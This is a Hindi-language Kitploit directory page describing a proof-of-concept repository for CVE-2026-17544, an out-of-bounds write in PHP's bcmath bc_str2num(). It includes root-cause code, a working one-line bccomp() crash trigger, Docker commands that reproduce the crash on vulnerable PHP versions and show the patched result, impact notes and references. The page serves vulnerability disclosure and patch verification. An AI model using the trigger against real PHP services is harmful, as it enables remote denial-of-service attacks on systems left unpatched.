Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-17544-PoC — CVE-2026-17544 — PHP bcmath bccomp() OOB लेखन (स्टैक स्मैशिंग)। सत्यापित: 8.4.23/8.5.8 पर क्रैश, 8.4.24 में ठीक हुआ। GHSA-x692-q9x7-8c3f | Kitploit
उपकरण/GitHubGitHub/boreas37/cve-2026-17544-poc
भेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubboreas37/cve-2026-17544-poc

CVE-2026-17544-PoC

CVE-2026-17544 — PHP bcmath bccomp() OOB लेखन (स्टैक स्मैशिंग)। सत्यापित: 8.4.23/8.5.8 पर क्रैश, 8.4.24 में ठीक हुआ। GHSA-x692-q9x7-8c3f

रिपॉजिटरी देखें
638 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-17544 — PHP bcmath bccomp() आउट-ऑफ-बाउंड लेखन (स्टैक स्मैशिंग)

CVSS 9.8 (गंभीर) · CWE-787 · GHSA-x692-q9x7-8c3f

सारांश

ext/bcmath/libbcmath/src/str2num.c (वेंडर किया गया libbcmath, PHP 8.4+) में स्थित bc_str2num() में एक off-by-N आउट-ऑफ-बाउंड लेखन शामिल है। जब उपयोगकर्ता द्वारा आपूर्ति किया गया scale, ऑपरेंड के स्वचालित स्केल से छोटा होता है, तो भिन्नांश छोटा कर दिया जाता है और फिर एक अंतिम-शून्य ट्रिम fractional_end को अद्यतन किए बिना चलता है। बफ़र ट्रिम किए गए (छोटे) आकार के लिए आवंटित किया जाता है, लेकिन कॉपी बिना-ट्रिम लंबाई का उपयोग करती है → हीप/स्टैक बफ़र ओवरफ़्लो।

प्रभावित: PHP 8.4.* < 8.4.24, 8.5.* < 8.5.9 सुधार: PHP 8.4.24 / 8.5.9 (2026-07-30), commit fa18dab73f93 / ce2ec8a70755 रिपोर्टकर्ता श्रेय: Recep Asan (recepasan)

मूल कारण

root@kitploit:~
// ext/bcmath/libbcmath/src/str2num.c — bc_str2num()
str_scale -= fractional_end - fractional_new_end;   // fractional_end NOT updated here
...
bc_new_num_nonzeroed(digits, str_scale)            // allocates SHORT (trimmed) buffer
bc_copy_and_toggle_bcd(nptr, fractional_ptr, fractional_end)  // copies UNTRIMMED length

एक-पंक्ति सुधार (fractional_end = fractional_new_end;) के साथ रिग्रेशन टेस्ट ext/bcmath/tests/GHSA-x692-q9x7-8c3f.phpt को 8.4.24/8.5.9 में मर्ज किया गया।

ट्रिगर (सत्यापित)

root@kitploit:~
bccomp("1." . "9" . str_repeat("0", 300) . "1", "0", 300);

2026-08-12 को Raspberry Pi 5 (arm64) पर Docker के माध्यम से सत्यापित किया गया।

उपयोग

root@kitploit:~
# Vulnerable PHP:
docker run --rm -v "$PWD":/app -w /app php:8.4.23-cli sh -c \
  'docker-php-ext-install bcmath >/dev/null 2>&1 && php trigger.php'
# -> stack smashing detected (exit 133)

# Patched PHP:
docker run --rm -v "$PWD":/app -w /app php:8.4.24-cli sh -c \
  'docker-php-ext-install bcmath >/dev/null 2>&1 && php trigger.php'
# -> int(1), exit 0

प्रभाव

  • रिमोट DoS: कोई भी सेवा जो bccomp() को हमलावर-नियंत्रित ऑपरेंड/स्केल भेजती है, उसे नियतात्मक रूप से क्रैश किया जा सकता है (8.4/8.5, स्टैक-प्रोटेक्टर बिल्ड एबॉर्ट हो जाते हैं; गैर-संरक्षित बिल्ड सहेजे गए रजिस्टर/रिटर्न एड्रेस को दूषित करते हैं)।
  • RCE: सैद्धांतिक रूप से heap grooming के माध्यम से संभव है, लेकिन OOB बाइट्स केवल BCD मानों (0x00–0x09) तक सीमित हैं और ओवरफ़्लो आकार = ट्रिम किए गए शून्यों की संख्या — कठिन है, प्रदर्शित नहीं किया गया।

संदर्भ

  • GHSA: https://github.com/php/php-src/security/advisories/GHSA-x692-q9x7-8c3f
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-17544
  • सुधार 8.4: fa18dab73f93 · सुधार 8.5: ce2ec8a70755
टूल डाउनलोड करें
बिल्डपरिणाम
PHP 8.4.23 (असुरक्षित, Docker php:8.4.23-cli + bcmath)💥 *** stack smashing detected ***, exit 133 (SIGABRT)
PHP 8.5.8 (असुरक्षित)💥 वही — नियतात्मक एबॉर्ट
PHP 8.4.24 (पैच किया गया, php:8.4.24-cli)✅ int(1), exit 0